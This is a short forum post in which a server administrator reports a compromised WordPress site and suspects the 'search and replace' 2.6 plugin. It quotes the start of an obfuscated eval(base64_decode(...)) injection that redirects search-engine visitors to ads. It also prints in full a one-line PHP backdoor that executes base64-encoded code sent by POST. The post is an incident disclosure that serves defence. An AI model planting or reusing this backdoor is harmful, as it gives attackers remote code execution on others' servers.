Possible security issue in "search and repalce" 2.6
-
Hi,
One the server I’m administrating was corrupted. We aren’t exactly sure about what happened yet but here’s what we’ve found:
– There’s a block of code beginning with<?php eval(base64_decode("DQplcnJvcl...
at the top of each php file on the server. This code redirects visitors to ads when their referrer is a search engine.
– There’s a single backdoor in the theme of a WordPress installed on the server:<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>
. Since this code is only present once on the server, we think the origin of the exploit can be narrowed down to this WordPress install.
– There are several plugins installed on this WordPress, including “search and replace”, but search-and-replace.php is the only file on the server that is riddled with<?php eval(base64_decode("DQplcnJvcl...
blocks (not just one at the top), see this pastebin: http://pastebin.com/jmynTEgxI just wanted to let you know and see if other users had similar troubles.
- The topic ‘Possible security issue in "search and repalce" 2.6’ is closed to new replies.